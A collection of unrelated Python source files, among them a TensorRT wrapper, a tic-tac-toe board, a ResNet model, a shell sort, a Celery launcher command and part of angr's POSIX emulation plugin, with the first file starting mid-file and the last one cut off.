msg = white_background + bright_style + red_text
msg += 'DeprecationWarning: This tool will be deprecated in future. '
msg += blue_text + \
'Welcome to use the unified model deployment toolbox '
msg += 'MMDeploy: https://github.com/open-mmlab/mmdeploy'
msg += reset_style
warnings.warn(msg)
super().__init__()
self.engine = engine
if isinstance(self.engine, str):
self.engine = load_trt_engine(engine)
if not isinstance(self.engine, trt.ICudaEngine):
raise TypeError('engine should be str or trt.ICudaEngine')
self._register_state_dict_hook(TRTWrapper._on_state_dict)
self.context = self.engine.create_execution_context()
# get input and output names from engine
if input_names is None or output_names is None:
names = [_ for _ in self.engine]
input_names = list(filter(self.engine.binding_is_input, names))
output_names = list(set(names) - set(input_names))
self.input_names = input_names
self.output_names = output_names
def _on_state_dict(self, state_dict, prefix, local_metadata):
state_dict[prefix + 'engine'] = bytearray(self.engine.serialize())
state_dict[prefix + 'input_names'] = self.input_names
state_dict[prefix + 'output_names'] = self.output_names
def _load_from_state_dict(self, state_dict, prefix, local_metadata, strict,
missing_keys, unexpected_keys, error_msgs):
engine_bytes = state_dict[prefix + 'engine']
with trt.Logger() as logger, trt.Runtime(logger) as runtime:
self.engine = runtime.deserialize_cuda_engine(engine_bytes)
self.context = self.engine.create_execution_context()
self.input_names = state_dict[prefix + 'input_names']
self.output_names = state_dict[prefix + 'output_names']
def forward(self, inputs):
"""
Arguments:
inputs (dict): dict of input name-tensors pair
Return:
dict: dict of output name-tensors pair
"""
assert self.input_names is not None
assert self.output_names is not None
bindings = [None] * (len(self.input_names) + len(self.output_names))
for input_name, input_tensor in inputs.items():
idx = self.engine.get_binding_index(input_name)
if input_tensor.dtype == torch.long:
input_tensor = input_tensor.int()
self.context.set_binding_shape(idx, tuple(input_tensor.shape))
bindings[idx] = input_tensor.contiguous().data_ptr()
# create output tensors
outputs = {}
for i, output_name in enumerate(self.output_names):
idx = self.engine.get_binding_index(output_name)
dtype = torch_dtype_from_trt(self.engine.get_binding_dtype(idx))
shape = tuple(self.context.get_binding_shape(idx))
device = torch_device_from_trt(self.engine.get_location(idx))
output = torch.empty(size=shape, dtype=dtype, device=device)
outputs[output_name] = output
bindings[idx] = output.data_ptr()
self.context.execute_async_v2(bindings,
torch.cuda.current_stream().cuda_stream)
return outputs
class TRTWraper(TRTWrapper):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
warnings.warn(
'TRTWraper will be deprecated in'
' future. Please use TRTWrapper instead', DeprecationWarning)
|
py | b415ae77a5bfe8d36109a07ce7281f8f5dc16e1b | from src.exceptions import AlreadySelectedError
class Board:
def __init__(self):
self.turn = "O"
self._board = {
(1,1) : None,
(1,2) : None,
(1,3) : None,
(2,1) : None,
(2,2) : None,
(2,3) : None,
(3,1) : None,
(3,2) : None,
(3,3) : None,
}
self._win_combinaisons = [
((1,1), (1,2), (1,3)),
((2,1), (2,2), (2,3)),
((3,1), (3,2), (3,3)),
((1,1), (2,1), (3,1)),
((1,2), (2,2), (3,2)),
((1,3), (2,3), (3,3)),
((1,1), (2,2), (3,3)),
((1,3), (2,2), (3,1)),
]
def __getitem__(self, index):
if index[0] > 3 or index[1] > 3 or index[0] < 1 or index[1] < 1:
raise IndexError("")
return self._board[index]
def __setitem__(self, index, value):
if index[0] > 3 or index[1] > 3 or index[0] < 1 or index[1] < 1:
raise IndexError("")
if value != "O" and value != "X":
raise ValueError("")
if self._board[index] != None:
raise AlreadySelectedError("this case is already selected")
self._board[index] = value
self.__inverse_turns()
def __inverse_turns(self):
if self.turn == "O":
self.turn = "X"
elif self.turn == "X":
self.turn = "O"
def check_saturation(self):
for index, value in self._board.items():
if value == None:
return False
return True
def check_winer(self):
for combinaison in self._win_combinaisons:
value = self.check_combinaison(combinaison)
if value != False:
return value, combinaison
return False
def check_combinaison(self, combinaison):
if self._board[combinaison[0]] == None:
return False
else:
if self._board[combinaison[0]] != self._board[combinaison[1]]:
return False
else:
if self._board[combinaison[0]] != self._board[combinaison[2]]:
return False
else:
return self._board[combinaison[0]]
|
py | b415ae914829dca93ccf21f9bfe3df265f33b6a4 | from rest_framework.pagination import LimitOffsetPagination, PageNumberPagination
class PostLimitOffsetPagination(LimitOffsetPagination):
default_limit = 2
max_limit = 4
class PostPageNumberPagination(PageNumberPagination):
page_size = 8
class CategoryPageNumberPagination(PageNumberPagination):
page_size = 10
|
py | b415af2ce7c38ffd5f4eb1365d33397eee37fac6 | import torch.nn as nn
import torch.nn.functional as F
def conv3x3(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=True)
def cfg(depth):
depth_lst = [18, 34, 50, 101, 152]
assert (depth in depth_lst), "Error : Resnet depth should be either 18, 34, 50, 101, 152"
cf_dict = {
'18': (BasicBlock, [2, 2, 2, 2]),
'34': (BasicBlock, [3, 4, 6, 3]),
'50': (Bottleneck, [3, 4, 6, 3]),
'101': (Bottleneck, [3, 4, 23, 3]),
'152': (Bottleneck, [3, 8, 36, 3]),
}
return cf_dict[str(depth)]
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, in_planes, planes, stride=1):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(in_planes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion * planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=True),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.bn2(self.conv2(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, in_planes, planes, stride=1):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=True)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=True)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, self.expansion*planes, kernel_size=1, bias=True)
self.bn3 = nn.BatchNorm2d(self.expansion*planes)
self.shortcut = nn.Sequential()
if stride != 1 or in_planes != self.expansion*planes:
self.shortcut = nn.Sequential(
nn.Conv2d(in_planes, self.expansion*planes, kernel_size=1, stride=stride, bias=True),
nn.BatchNorm2d(self.expansion*planes)
)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = F.relu(self.bn2(self.conv2(out)))
out = self.bn3(self.conv3(out))
out += self.shortcut(x)
out = F.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, depth, num_classes):
super(ResNet, self).__init__()
self.in_planes = 16
block, num_blocks = cfg(depth)
self.conv1 = conv3x3(3,16)
self.bn1 = nn.BatchNorm2d(16)
self.layer1 = self._make_layer(block, 16, num_blocks[0], stride=1)
self.layer2 = self._make_layer(block, 32, num_blocks[1], stride=2)
self.layer3 = self._make_layer(block, 64, num_blocks[2], stride=2)
self.linear = nn.Linear(64*block.expansion, num_classes)
def _make_layer(self, block, planes, num_blocks, stride):
strides = [stride] + [1]*(num_blocks-1)
layers = []
for stride in strides:
layers.append(block(self.in_planes, planes, stride))
self.in_planes = planes * block.expansion
return nn.Sequential(*layers)
def forward(self, x):
out = F.relu(self.bn1(self.conv1(x)))
out = self.layer1(out)
out = self.layer2(out)
out = self.layer3(out)
out = F.avg_pool2d(out, 8)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
|
py | b415af72b0f62905214acaeedfed5355b64fa525 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import tempfile
import devtools_test_base
import pyauto_functional # Must be imported before pyauto
import pyauto
import pyauto_utils
class DevToolsInstrumentedObjectsCheck(devtools_test_base.DevToolsTestBase):
"""Test for checking that all instrumented objects are allocated by tcmalloc.
This test navigates the browser to a test page, then takes native memory
snapshot over remote debugging protocol and prints the number of objects
that were counted by the DevTools memory instrumentation and how many of
them have not been allocated by tcmalloc. Ideally the latter number should
be 0.
The test starts browser with HEAPPROFILE environment variable to enable
tcmalloc heap profiler which is required by the memory instrumentation to
check which of the instrumented objects have actually been allocated on the
heap.
The test uses Web Page Replay server as a proxy that allows to replay
the same state of the test pages and avoid heavy network traffic on the
real web sites. See webpagereplay.ReplayServer documentation to learn how
to record new page archives.
"""
def setUp(self):
# Make sure Chrome is started with tcmalloc heap profiler enabled. Dump
# profiles into a temporary directory that will be destroyed when the test
# completes.
self._tempdir = tempfile.mkdtemp(prefix='devtools-test')
os.environ['HEAPPROFILE'] = os.path.join(self._tempdir, 'heap-profile.')
super(DevToolsInstrumentedObjectsCheck, self).setUp()
def tearDown(self):
super(DevToolsInstrumentedObjectsCheck, self).tearDown()
del os.environ['HEAPPROFILE']
if self._tempdir:
pyauto_utils.RemovePath(self._tempdir)
def testNytimes(self):
self.RunTestWithUrl('http://www.nytimes.com/')
def testCnn(self):
self.RunTestWithUrl('http://www.cnn.com/')
def testGoogle(self):
self.RunTestWithUrl('http://www.google.com/')
def PrintTestResult(self, hostname, snapshot):
total = snapshot.GetProcessPrivateMemorySize()
counted_objects = snapshot.GetInstrumentedObjectsCount()
counted_unknown_objects = snapshot.GetNumberOfInstrumentedObjectsNotInHeap()
if not counted_objects or not counted_unknown_objects:
logging.info('No information about number of instrumented objects.')
return
logging.info('Got data for: %s, objects count = %d (unknown = %d) ' %
(hostname, counted_objects, counted_unknown_objects))
pyauto_utils.PrintPerfResult('DevTools Unknown Instrumented Objects',
hostname, counted_unknown_objects, 'objects')
if __name__ == '__main__':
pyauto_functional.Main()
|
py | b415af876b91290b0482a679dd9f34e5b12f5482 | # -*- coding: UTF-8 -*-
#
# Shell Sort Algorithm
# The All ▲lgorithms library for python
#
# Contributed by: Elias
# Github: @eliasbayona
#
def shell_sort(arr):
n = len(arr)
h = int(n/2)
while h > 0:
for i in range(h,n):
temp = arr[i]
j = i
while j >= h and arr[j-h] >temp:
arr[j] = arr[j-h]
j -= h
arr[j] = temp
h = int(h/2)
return arr
|
py | b415af9eb13f8798d673ac878c64cdf51401b357 | IMAGES = [{
'accountId': 1234,
'blockDevices': [],
'createDate': '2013-12-05T21:53:03-06:00',
'globalIdentifier': '0B5DEAF4-643D-46CA-A695-CECBE8832C9D',
'id': 100,
'name': 'test_image',
'parentId': ''
}, {
'accountId': 1234,
'blockDevices': [],
'createDate': '2013-12-05T21:53:03-06:00',
'globalIdentifier': 'EB38414C-2AB3-47F3-BBBD-56A5F689620B',
'id': 101,
'name': 'test_image2',
'parentId': ''
}]
getObject = IMAGES[0]
getPublicImages = IMAGES
deleteObject = {}
editObject = True
setTags = True
createFromExternalSource = [{
'createDate': '2013-12-05T21:53:03-06:00',
'globalIdentifier': '0B5DEAF4-643D-46CA-A695-CECBE8832C9D',
'id': 100,
'name': 'test_image',
}]
|
py | b415b08c5d19e21b845c1974d7f68e34a46a2cd6 | # Copyright 2020 reinforced_scinet (https://github.com/hendrikpn/reinforced_scinet)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from torch.multiprocessing import Process, Value
from datetime import datetime
import numpy as np
import sys
import warnings
import time
from config import Config
class PredictorProcess(Process):
def __init__(self, agent, observation_q, prediction_qs, env_id, predictor_id):
"""
Predictors gather observations from agents and make predictions.
Args:
agent (:class:`base_networks.DeepPS`): The deep PS model for RL.
observation_q (:class:`mp.Queue`): Shared memory queue with observations of agents of the same type.
prediction_qs (:obj:`list` of :class:`mp.Queue`): Shared memory queues containing predictions.
env_id (str): The identifier for the environment type.
predictor_id (int): The id of the trainer process.
"""
super(PredictorProcess, self).__init__()
self.agent = agent
self.observation_q = observation_q
self.prediction_qs = prediction_qs
self.env_id = env_id
self.id = predictor_id
#int: Signal for process exit.
self.exit_flag = Value('i', 0)
#torch.Tensor of float: Array of actions in one-hot encoding.
self.actions = torch.Tensor(np.eye(Config.NUM_ACTIONS)).to(Config.DEVICE)
def predict(self, observation_batch):
"""
Predict h-values with neural network model.
Forward pass through the network.
Args:
observation_batch (torch.Tensor): Tensor which represents the batched states of the environments.
Returns:
h_values (torch.Tensor): List of weights which define h-values in the PS framework.
"""
# Forward pass.
with torch.no_grad():
h_values = torch.empty(0, device=observation_batch.device)
for action in self.actions:
h_val_batch = self.agent.forward_no_selection(observation_batch, action.reshape(1, len(action)))
h_values = torch.cat((h_values, h_val_batch), dim=1)
return h_values
def run(self):
"""
Runs the process predictor.
(i) Gets observation data from prediction queue.
(ii) Send data to device.
(iii) Gathers predictions with shared model.
(iv) Distributes predictions to agents.
"""
print(f'Spawning predictor #{self.id} for type {self.env_id}')
sys.stdout.flush()
while not self.exit_flag.value:
# (i) Get observation data.
id_batch = torch.zeros(Config.PREDICTION_BATCH_SIZE, dtype=torch.int32)
observation_batch = torch.zeros((Config.PREDICTION_BATCH_SIZE, Config.INPUT_SIZE))
# "EOFError" on some clusters can be removed by mp.Event() or mp.set_sharing_strategy('file_system')
Id, observation = self.observation_q.get() # fix error with mp.set_sharing_strategy('file_system')
id_batch[0], observation_batch[0] = Id.item(), observation
size = 1
while size < Config.PREDICTION_BATCH_SIZE and not self.observation_q.empty():
Id, observation = self.observation_q.get()
id_batch[size], observation_batch[size] = Id.item(), observation
size += 1
# (ii) Resize data and Transfer to device.
id_batch = id_batch[:size]
observation_batch = observation_batch[:size].to(Config.DEVICE)
#(iii) Make prediction.
h_values = self.predict(observation_batch).to('cpu')
# (iv) Add to queue.
for index, i in enumerate(id_batch):
# "RuntimeError: received 0 items of ancdata" can be fixed with mp.set_sharing_strategy('file_system')
self.prediction_qs[i].put(h_values[index]) # fix error with mp.set_sharing_strategy('file_system')
print(f'Closed predictor #{self.id}')
sys.stdout.flush()
|
py | b415b1765e69d660fdecaff69f9b68f749afd9a8 | # SPDX-License-Identifier: Apache-2.0
# example: dashboard dashboard_celery worker -Q storage -l debug
from __future__ import absolute_import, unicode_literals
import logging
import os
from django.core.management.base import BaseCommand
log = logging.getLogger(__package__)
def reusable_run_from_argv(argv):
"""Replace python with celery process with given arguments."""
appname = __name__.split('.', 1)[0] + '.celery:app'
appname_arguments = ['-A', appname]
log.info(argv[1])
log.info(argv[1:2] + appname_arguments + argv[2:])
# todo: fix Starting a process without a shell.
# todo: fix Starting a process with a partial executable path
# Not fixed because if the binary can be replaced, this is the least of our problems
os.execvp("celery", argv[1:2] + appname_arguments + argv[2:]) # nosec
class Command(BaseCommand): # pylint: disable=abstract-method
"""Celery command wrapper."""
help = __doc__
# disable (MySQL) check on startup
requires_system_checks = False
def run_from_argv(self, argv):
reusable_run_from_argv(argv)
|
py | b415b1a9b5bb34617add6e6dd41d8946fc993dcf | import logging
from .plugin import SimStatePlugin
from .filesystem import SimMount, Stat
from ..storage.file import SimFile, SimPacketsStream, Flags, SimFileDescriptor, SimFileDescriptorDuplex
from .. import sim_options as options
l = logging.getLogger(name=__name__)
max_fds = 8192
class PosixDevFS(SimMount): # this'll be mounted at /dev
def get(self, path): # pylint: disable=arguments-differ
if path == ['stdin']:
return self.state.posix.fd.get(0, None)
elif path == ['stdout']:
return self.state.posix.fd.get(1, None)
elif path == ['stderr']:
return self.state.posix.fd.get(2, None)
else:
return None
def insert(self, path, simfile): # pylint: disable=unused-argument, arguments-differ
return False
def delete(self, path): # pylint: disable=unused-argument, arguments-differ
return False
def lookup(self, _): # disable=unused-argument
return False
def merge(self, others, conditions, common_ancestor=None): # pylint: disable=unused-argument, arguments-differ
return False
def widen(self, others): # pylint: disable=unused-argument
return False
def copy(self, _):
return self # this holds no state!
class PosixProcFS(SimMount):
"""
The virtual file system mounted at /proc (as of now, on Linux).
"""
def get(self, path): # pylint: disable=arguments-differ
if path == [b"uptime"]:
return SimFile(b"uptime", content=b"0 0")
else:
return None
def insert(self, path, simfile): # pylint: disable=unused-argument, arguments-differ
return False
def delete(self, path): # pylint: disable=unused-argument, arguments-differ
return False
def lookup(self, _): # disable=unused-argument
return False
def merge(self, others, conditions, common_ancestor=None): # pylint: disable=unused-argument, arguments-differ
return False
def widen(self, others): # pylint: disable=unused-argument
return False
def copy(self, _):
return self # this holds no state!
class SimSystemPosix(SimStatePlugin):
"""
Data storage and interaction mechanisms for states with an environment conforming to posix.
Available as ``state.posix``.
"""
#__slots__ = [ 'maximum_symbolic_syscalls', 'files', 'max_length' ]
# some posix constants
SIG_BLOCK=0
SIG_UNBLOCK=1
SIG_SETMASK=2
EPERM = 1 # /* Operation not permitted */
ENOENT = 2 # /* No such file or directory */
ESRCH = 3 # /* No such process */
EINTR = 4 # /* Interrupted system call */
EIO = 5 # /* I/O error */
ENXIO = 6 # /* No such device or address */
E2BIG = 7 # /* Argument list too long */
ENOEXEC = 8 # /* Exec format error */
EBADF = 9 # /* Bad file number */
ECHILD = 10 # /* No child processes */
EAGAIN = 11 # /* Try again */
ENOMEM = 12 # /* Out of memory */
EACCES = 13 # /* Permission denied */
EFAULT = 14 # /* Bad address */
ENOTBLK = 15 # /* Block device required */
EBUSY = 16 # /* Device or resource busy */
EEXIST = 17 # /* File exists */
EXDEV = 18 # /* Cross-device link */
ENODEV = 19 # /* No such device */
ENOTDIR = 20 # /* Not a directory */
EISDIR = 21 # /* Is a directory */
EINVAL = 22 # /* Invalid argument */
ENFILE = 23 # /* File table overflow */
EMFILE = 24 # /* Too many open files */
ENOTTY = 25 # /* Not a typewriter */
ETXTBSY = 26 # /* Text file busy */
EFBIG = 27 # /* File too large */
ENOSPC = 28 # /* No space left on device */
ESPIPE = 29 # /* Illegal seek */
EROFS = 30 # /* Read-only file system */
EMLINK = 31 # /* Too many links */
EPIPE = 32 # /* Broken pipe */
EDOM = 33 # /* Math argument out of domain of func */
ERANGE = 34 # /* Math result not representable */
def __init__(self,
stdin=None,
stdout=None,
stderr=None,
fd=None,
sockets=None,
socket_queue=None,
argv=None,
argc=None,
environ=None,
auxv=None,
tls_modules=None,
sigmask=None,
pid=None,
ppid=None,
uid=None,
gid=None,
brk=None):
super().__init__()
# some limits and constants
self.sigmask_bits = 1024
self.maximum_symbolic_syscalls = 255
self.max_length = 2 ** 16
self.argc = argc
self.argv = argv
self.environ = environ
self.auxv = auxv
self.tls_modules = tls_modules if tls_modules is not None else {}
self.brk = brk if brk is not None else 0x1b00000
self._sigmask = sigmask
self.pid = 1337 if pid is None else pid
self.ppid = 1336 if ppid is None else ppid
self.uid = 1000 if uid is None else uid
self.gid = 1000 if gid is None else gid
self.dev_fs = None
self.proc_fs = None
self.autotmp_counter = 0
self._closed_fds = []
self.sockets = sockets if sockets is not None else {}
self.socket_queue = socket_queue if socket_queue is not None else []
if stdin is None:
stdin = SimPacketsStream('stdin', write_mode=False, writable=False, ident='stdin')
if stdout is None:
stdout = SimPacketsStream('stdout', write_mode=True, writable=True, ident='stdout')
if stderr is None:
stderr = SimPacketsStream('stderr', write_mode=True, writable=True, ident='stderr')
if fd is None:
fd = {}
tty = SimFileDescriptorDuplex(stdin, stdout)
# the initial fd layout just looks like this:
# lrwx------ 1 audrey audrey 64 Jan 17 14:21 0 -> /dev/pts/4
# lrwx------ 1 audrey audrey 64 Jan 17 14:21 1 -> /dev/pts/4
# lrwx------ 1 audrey audrey 64 Jan 17 14:21 2 -> /dev/pts/4
# but we want to distinguish the streams. we compromise by having 0 and 1 go to the "tty"
# and stderr goes to a special stderr file
fd[0] = tty
fd[1] = tty
fd[2] = SimFileDescriptor(stderr, 0)
self.fd = fd
# these are the storage mechanisms!
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
@property
def closed_fds(self):
for _, f in self._closed_fds:
f.set_state(self.state)
return self._closed_fds
def init_state(self):
if self.dev_fs is None:
self.dev_fs = PosixDevFS()
self.state.fs.mount(b"/dev", self.dev_fs)
if self.proc_fs is None:
self.proc_fs = PosixProcFS()
self.state.fs.mount(b"/proc", self.proc_fs)
def set_brk(self, new_brk):
# arch word size is not available at init for some reason, fix that here
if isinstance(self.brk, int):
self.brk = self.state.solver.BVV(self.brk, self.state.arch.bits)
if new_brk.symbolic:
l.warning("Program is requesting a symbolic brk! This cannot be emulated cleanly!")
self.brk = self.state.solver.If(new_brk < self.brk, self.brk, new_brk)
else:
conc_start = self.state.solver.eval(self.brk)
conc_end = self.state.solver.eval(new_brk)
# failure case: new brk is less than old brk
if conc_end < conc_start:
pass
else:
# set break! we might not actually need to allocate memory though... pages
self.brk = new_brk
# if the old and new are in different pages, map
# we check the byte before each of them since the "break" is the address of the first
# "unmapped" byte...
if ((conc_start-1) ^ (conc_end-1)) & ~0xfff:
# align up
if conc_start & 0xfff:
conc_start = (conc_start & ~0xfff) + 0x1000
if conc_end & 0xfff:
conc_end = (conc_end & ~0xfff) + 0x1000
# TODO: figure out what permissions to use
self.state.memory.map_region(conc_start, conc_end - conc_start, 7)
return self.brk
def set_state(self, state):
super().set_state(state)
for fd in self.fd:
self.fd[fd].set_state(state)
self.stdin.set_state(state)
self.stdout.set_state(state)
self.stderr.set_state(state)
if self.socket_queue:
for sock_pair in self.socket_queue:
if not sock_pair:
continue
sock_pair[0].set_state(state)
sock_pair[1].set_state(state)
if self.sockets:
for sock_pair in self.sockets.values():
sock_pair[0].set_state(state)
sock_pair[1].set_state(state)
def _pick_fd(self):
for fd in range(0, 8192):
if fd not in self.fd:
return fd
raise SimPosixError('exhausted file descriptors')
def open(self, name, flags, preferred_fd=None):
"""
Open a symbolic file. Basically open(2).
:param name: Path of the symbolic file, as a string or bytes.
:type name: string or bytes
:param flags: File operation flags, a bitfield of constants from open(2), as an AST
:param preferred_fd: Assign this fd if it's not already claimed.
:return: The file descriptor number allocated (maps through posix.get_fd to a SimFileDescriptor)
or None if the open fails.
``mode`` from open(2) is unsupported at present.
"""
if len(name) == 0:
return None
if type(name) is str:
name = name.encode()
# FIXME: HACK
if self.uid != 0 and name.startswith(b'/var/run'):
return None
# TODO: speed this up (editor's note: ...really? this is fine)
fd = None
if preferred_fd is not None and preferred_fd not in self.fd:
fd = preferred_fd
else:
fd = self._pick_fd()
flags = self.state.solver.eval(flags)
writing = (flags & Flags.O_ACCMODE) in (Flags.O_RDWR, Flags.O_WRONLY)
simfile = self.state.fs.get(name)
if simfile is None:
ident = SimFile.make_ident(name)
if not writing:
if options.ALL_FILES_EXIST not in self.state.options:
return None
l.warning("Trying to open unknown file %s - created a symbolic file since ALL_FILES_EXIST is set", name)
simfile = SimFile(name, ident=ident, size=self.state.solver.BVS('filesize_%s' % ident, self.state.arch.bits, key=('file', ident, 'filesize'), eternal=True))
else:
simfile = SimFile(name, ident=ident)
if not self.state.fs.insert(name, simfile):
return None
simfd = SimFileDescriptor(simfile, flags)
simfd.set_state(self.state)
self.fd[fd] = simfd
return fd
def open_socket(self, ident):
fd = self._pick_fd()
# we need a sockpair, or a pair of storage mechanisms that will be duplexed to form the socket
# we can get them from either:
# a) the socket identifier store
# b) the socket queue
# c) making them ourselves
# in the latter two cases we need to attach them to the socket identifier store
# control flow sucks. we should be doing our analysis with nothing but mov instructions
sockpair = None
if ident not in self.sockets:
if self.socket_queue:
sockpair = self.socket_queue.pop(0)
if sockpair is not None:
memo = {}
# Since we are not copying sockpairs when the FS state plugin branches, their original SimState
# instances might have long gone. Update their states before making copies.
sockpair[0].set_state(self.state)
sockpair[1].set_state(self.state)
sockpair = sockpair[0].copy(memo), sockpair[1].copy(memo)
if sockpair is None:
read_file = SimPacketsStream('socket %s read' % str(ident))
write_file = SimPacketsStream('socket %s write' % str(ident))
sockpair = (read_file, write_file)
self.sockets[ident] = sockpair
else:
sockpair = self.sockets[ident]
simfd = SimFileDescriptorDuplex(sockpair[0], sockpair[1])
simfd.set_state(self.state)
self.fd[fd] = simfd
return fd
def get_fd(self, fd):
"""
Looks up the SimFileDescriptor associated with the given number (an AST).
If the number is concrete and does not map to anything, return None.
If the number is symbolic, constrain it to an open fd and create a new file for it.
"""
try:
fd = self.state.solver.eval_one(fd)
return self.fd.get(fd)
except SimSolverError:
pass
ideal = self._pick_fd()
self.state.solver.add(fd == ideal)
if not self.state.solver.satisfiable():
raise SimPosixError("Tried to do operation on symbolic but partially constrained file descriptor")
fd = ideal
new_filename = b'/tmp/angr_implicit_%d' % self.autotmp_counter
l.warning("Tried to look up a symbolic fd - constrained to %d and opened %s", ideal, new_filename)
self.autotmp_counter += 1
if self.open(new_filename, Flags.O_RDWR, preferred_fd=fd) != fd:
raise SimPosixError("Something went wrong trying to open implicit temp")
return self.fd.get(fd)
def close(self, fd):
"""
Closes the given file descriptor (an AST).
Returns whether the operation succeeded (a concrete boolean)
"""
try:
fd = self.state.solver.eval_one(fd)
except SimSolverError:
l.error("Trying to close a symbolic file descriptor")
return False
if fd not in self.fd:
l.info("Trying to close an unopened file descriptor")
return False
self.state.history.add_event('fs_close', fd=fd, close_idx=len(self.closed_fds))
self.closed_fds.append((fd, self.fd[fd]))
del self.fd[fd]
return True
def fstat(self, sim_fd): #pylint:disable=unused-argument
# sizes are AMD64-specific for symbolic files for now
fd = None
mount = None
mode = None
guest_path = None
if not self.state.solver.symbolic(sim_fd):
fd = self.state.solver.eval(sim_fd)
if fd is not None:
fd_desc = self.state.posix.get_fd(fd)
# a fd can be SimFileDescriptorDuplex which is not backed by a file
if isinstance(fd_desc, SimFileDescriptor):
sim_file = fd_desc.file
mount = self.state.fs.get_mountpoint(sim_file.name)[0]
if mount:
guest_path = mount.lookup(sim_file)
# if it is mounted, let the filesystem figure out the stat
if guest_path is not None and mount is not None:
stat = mount._get_stat(guest_path)
if stat is None:
raise SimPosixError("file %s does not exist on mount %s" % (guest_path, mount))
size = stat.st_size
mode = stat.st_mode
else:
# now we know it is not mounted, do the same as before
if not fd:
mode = self.state.solver.BVS('st_mode', 32, key=('api', 'fstat', 'st_mode'))
else:
mode = self.state.solver.BVS('st_mode', 32, key=('api', 'fstat', 'st_mode')) if fd > 2 else self.state.solver.BVV(0, 32)
size = self.state.solver.BVS('st_size', 64, key=('api', 'fstat', 'st_size')) # st_size
# return this weird bogus zero value to keep code paths in libc simple :\
return Stat(self.state.solver.BVV(0, 64), # st_dev
self.state.solver.BVV(0, 64), # st_ino
self.state.solver.BVV(0, 64), # st_nlink
mode, # st_mode
self.state.solver.BVV(0, 32), # st_uid (lol root)
self.state.solver.BVV(0, 32), # st_gid
self.state.solver.BVV(0, 64), # st_rdev
size, # st_size
self.state.solver.BVV(0x400, 64), # st_blksize
self.state.solver.BVV(0, 64), # st_blocks
self.state.solver.BVV(0, 64), # st_atime
self.state.solver.BVV(0, 64), # st_atimensec
self.state.solver.BVV(0, 64), # st_mtime
self.state.solver.BVV(0, 64), # st_mtimensec
self.state.solver.BVV(0, 64), # st_ctime
self.state.solver.BVV(0, 64)) # st_ctimensec
def sigmask(self, sigsetsize=None):
"""
Gets the current sigmask. If it's blank, a new one is created (of sigsetsize).
:param sigsetsize: the size (in *bytes* of the sigmask set)
:return: the sigmask
"""
if self._sigmask is None:
if sigsetsize is not None:
sc = self.state.solver.eval(sigsetsize)
self.state.add_constraints(sc == sigsetsize)
self._sigmask = self.state.solver.BVS('initial_sigmask', sc*self.state.arch.byte_width, key=('initial_sigmask',), eternal=True)
else:
self._sigmask = self.state.solver.BVS('initial_sigmask', self.sigmask_bits, key=('initial_sigmask',), eternal=True)
return self._sigmask
def sigprocmask(self, how, new_mask, sigsetsize, valid_ptr=True):
"""
Updates the signal mask.
:param how: the "how" argument of sigprocmask (see manpage)
:param new_mask: the mask modification to apply
:param sigsetsize: the size (in *bytes* of the sigmask set)
:param valid_ptr: is set if the new_mask was not NULL
"""
oldmask = self.sigmask(sigsetsize)
self._sigmask = self.state.solver.If(valid_ptr,
self.state.solver.If(how == self.SIG_BLOCK,
oldmask | new_mask,
self.state.solver.If(how == self.SIG_UNBLOCK,
oldmask & (~new_mask),
self.state.solver.If(how == self.SIG_SETMASK,
new_mask,
oldmask
)
)
),
oldmask
)
@SimStatePlugin.memo
def copy(self, memo):
o = SimSystemPosix(
stdin=self.stdin.copy(memo),
stdout=self.stdout.copy(memo),
stderr=self.stderr.copy(memo),
fd={k: self.fd[k].copy(memo) for k in self.fd},
sockets={ident: tuple(x.copy(memo) for x in self.sockets[ident]) for ident in self.sockets},
socket_queue=self.socket_queue, # shouldn't need to copy this - should be copied before use.
# as a result, we must update the state of each socket before making
# copies.
argv=self.argv,
argc=self.argc,
environ=self.environ,
auxv=self.auxv,
tls_modules=self.tls_modules,
sigmask=self._sigmask,
pid=self.pid,
ppid=self.ppid,
uid=self.uid,
gid=self.gid,
brk=self.brk)
o.dev_fs = self.dev_fs.copy(memo)
o.proc_fs = self.proc_fs.copy(memo)
o._closed_fds = list(self._closed_fds)
return o
def merge(self, others, merge_conditions, common_ancestor=None):
for o in others:
if len(self.fd) != len(o.fd):
raise SimMergeError("Can't merge states with disparate open file descriptors")
for fd in self.fd:
if fd not in o.fd:
raise SimMergeError("Can't merge states with disparate open file descriptors")
if len(self.sockets) != len(o.sockets):
raise SimMergeError("Can't merge states with disparate sockets")
for ident in self.sockets:
if ident not in o.sockets:
raise SimMergeError("Can't merge states with disparate sockets")
if len(self.socket_queue) != len(o.socket_queue) or any(x is not y for x, y in zip(self.socket_queue, o.socket_queue)):
raise SimMergeError("Can't merge states with disparate socket queues")
merging_occurred = False
for fd in self.fd:
try:
